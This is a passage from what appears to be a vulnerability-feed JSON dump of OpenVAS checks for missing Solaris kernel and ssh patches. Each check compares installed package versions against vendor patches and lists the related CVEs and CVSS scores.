ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855192\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"127128-11\");\n script_cve_id(\"CVE-2007-5135\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 127128-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-127128-11-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"i386\", patch:\"127128-11\", package:\"SUNWcpc.i SUNWrcmdc SUNWpsu SUNWfss SUNWatfsu SUNWscplp SUNWopenssl-include SUNWudapltu SUNWrds SUNWarc SUNWahci SUNWfmd SUNWintgige SUNWbtool SUNWperl584core SUNWypr SUNWcry SUNWkrbu SUNWsmapi SUNWtavor SUNWgssk SUNWpsdcr SUNWmdb SUNWzfsu SUNWaudit SUNWtsr SUNWpapi SUNWsndmu SUNWnfssu SUNWkdcu SUNWmdr SUNWpcr SUNWpsdir SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWcsl SUNWcpcu SUNWrcmds SUNWvolu SUNWib SUNWnisu SUNWos86r SUNWtoo SUNWcryr SUNWsi3124 SUNWtnetc SUNWtsg SUNWypu SUNWmv88sx SUNWftduu SUNWppm SUNWusb SUNWzfsr SUNWckr SUNWcsr SUNW1394 SUNWgss SUNWkrbr SUNWtsu SUNWmdbr SUNWlxr SUNWpcu SUNWzfskr SUNWarcr SUNWmdu SUNWpamsc SUNWnxge.i SUNWpsh SUNWhea SUNWcakr.i SUNWnfsckr SUNWdtrp SUNWspnego SUNWdcar SUNWpl5u SUNWnfsskr SUNWtnetd SUNWcslr SUNWippcore SUNWlxu SUNWcsu SUNWnfscu SUNWesu SUNWcsd SUNWpsr SUNWipplr SUNWpsm-lpd SUNWzoneu SUNWipplu SUNWnfscr SUNWftdur SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:20", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kernel 127128-11", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2005-2969", "CVE-2006-4339", "CVE-2007-5135"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855192", "href": "http://plugins.openvas.org/nasl.php?oid=855192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kernel 127128-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kernel on solaris_5.10_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855192);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"127128-11\");\n script_cve_id(\"CVE-2007-5135\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2005-2969\");\n script_name( \"Solaris Update for kernel 127128-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-127128-11-1\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.10\", arch:\"i386\", patch:\"127128-11\", package:\"SUNWcpc.i SUNWrcmdc SUNWpsu SUNWfss SUNWatfsu SUNWscplp SUNWopenssl-include SUNWudapltu SUNWrds SUNWarc SUNWahci SUNWfmd SUNWintgige SUNWbtool SUNWperl584core SUNWypr SUNWcry SUNWkrbu SUNWsmapi SUNWtavor SUNWgssk SUNWpsdcr SUNWmdb SUNWzfsu SUNWaudit SUNWtsr SUNWpapi SUNWsndmu SUNWnfssu SUNWkdcu SUNWmdr SUNWpcr SUNWpsdir SUNWxcu4 SUNWudapltr SUNWdtrc SUNWopenssl-libraries SUNWcsl SUNWcpcu SUNWrcmds SUNWvolu SUNWib SUNWnisu SUNWos86r SUNWtoo SUNWcryr SUNWsi3124 SUNWtnetc SUNWtsg SUNWypu SUNWmv88sx SUNWftduu SUNWppm SUNWusb SUNWzfsr SUNWckr SUNWcsr SUNW1394 SUNWgss SUNWkrbr SUNWtsu SUNWmdbr SUNWlxr SUNWpcu SUNWzfskr SUNWarcr SUNWmdu SUNWpamsc SUNWnxge.i SUNWpsh SUNWhea SUNWcakr.i SUNWnfsckr SUNWdtrp SUNWspnego SUNWdcar SUNWpl5u SUNWnfsskr SUNWtnetd SUNWcslr SUNWippcore SUNWlxu SUNWcsu SUNWnfscu SUNWesu SUNWcsd SUNWpsr SUNWipplr SUNWpsm-lpd SUNWzoneu SUNWipplu SUNWnfscr SUNWftdur SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:15", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114356-19", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855742", "href": "http://plugins.openvas.org/nasl.php?oid=855742", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114356-19\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855742);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114356-19\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for /usr/bin/ssh 114356-19\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114356-19-1\");\n\n script_summary(\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"114356-19\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:07", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2010-02-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-48", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-12-19T00:00:00", "id": "OPENVAS:855835", "href": "http://plugins.openvas.org/nasl.php?oid=855835", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-48\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855835);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-03 13:24:57 +0100 (Wed, 03 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-48\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-0225\");\n script_name(\"Solaris Update for Kernel 122300-48\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-48-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"122300-48\", package:\"SUNWcar.us SUNWatfsu SUNWarc SUNWnfssx SUNWcar.m SUNWudfrx SUNWpdx SUNWmdb SUNWaudit SUNWsshdu SUNWnfscx SUNWnfssu FJSVhea SUNWcsl SUNWrsg SUNWrsgx SUNWrsgk SUNWsshdr SUNWses SUNWefcx.u SUNWvolu SUNWsshr SUNWdrr.u SUNWdrrx.us SUNWssadx SUNWcsxu SUNWcarx.us SUNWpiclu SUNWmdbx SUNWnfssr SUNWvolr SUNWdrr.us SUNWcsr SUNWefcx.us SUNWpd SUNWhea SUNWcslx SUNWcstlx SUNWcarx.u SUNWatfsr SUNWsshu SUNWcsu SUNWcar.u SUNWnfscu SUNWdrcrx.u SUNWdrrx.u SUNWssad SUNWpdu SUNWnfscr SUNWcstl SUNWudfr\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:46", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2010-02-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122301-48", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2017-12-21T00:00:00", "id": "OPENVAS:1361412562310855853", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855853", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122301-48\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855853\");\n script_version(\"$Revision: 8207 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 08:30:12 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-03 13:24:57 +0100 (Wed, 03 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122301-48\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-0225\");\n script_name(\"Solaris Update for Kernel 122301-48\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122301-48-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122301-48\", package:\"SUNWsshcu SUNWcar.i SUNWatfsu SUNWarc SUNWmdb SUNWaudit SUNWsshdu SUNWnfssu SUNWcsl SUNWrsg SUNWrsgk SUNWsshdr SUNWvolu SUNWsshr SUNWnfssr SUNWcsr SUNWhea SUNWatfsr SUNWsshu SUNWcsu SUNWnfscu SUNWnfscr SUNWcstl SUNWudfr\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:42", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114356-18", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114356-18\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855023\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114356-18\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for /usr/bin/ssh 114356-18\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114356-18-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"114356-18\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:22", "description": "Check for the Version of /usr/bin/ssh", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "Solaris Update for /usr/bin/ssh 114356-19", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855742", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for /usr/bin/ssh 114356-19\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"/usr/bin/ssh on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n /usr/bin/ssh\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855742\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 15:16:45 +0200 (Tue, 13 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114356-19\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-0225\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for /usr/bin/ssh 114356-19\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114356-19-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of /usr/bin/ssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"114356-19\", package:\"SUNWsshcu SUNWsshu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:04:54", "description": "Check for the Version of Kernel", "cvss3": {}, "published": "2010-02-03T00:00:00", "type": "openvas", "title": "Solaris Update for Kernel 122300-48", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339", "CVE-2008-1483", "CVE-2006-0225"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:1361412562310855835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855835", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for Kernel 122300-48\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Kernel on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n Kernel\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855835\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-03 13:24:57 +0100 (Wed, 03 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122300-48\");\n script_cve_id(\"CVE-2008-1483\", \"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-0225\");\n script_name(\"Solaris Update for Kernel 122300-48\");\n\n script_xref(name : \"URL\" , value : 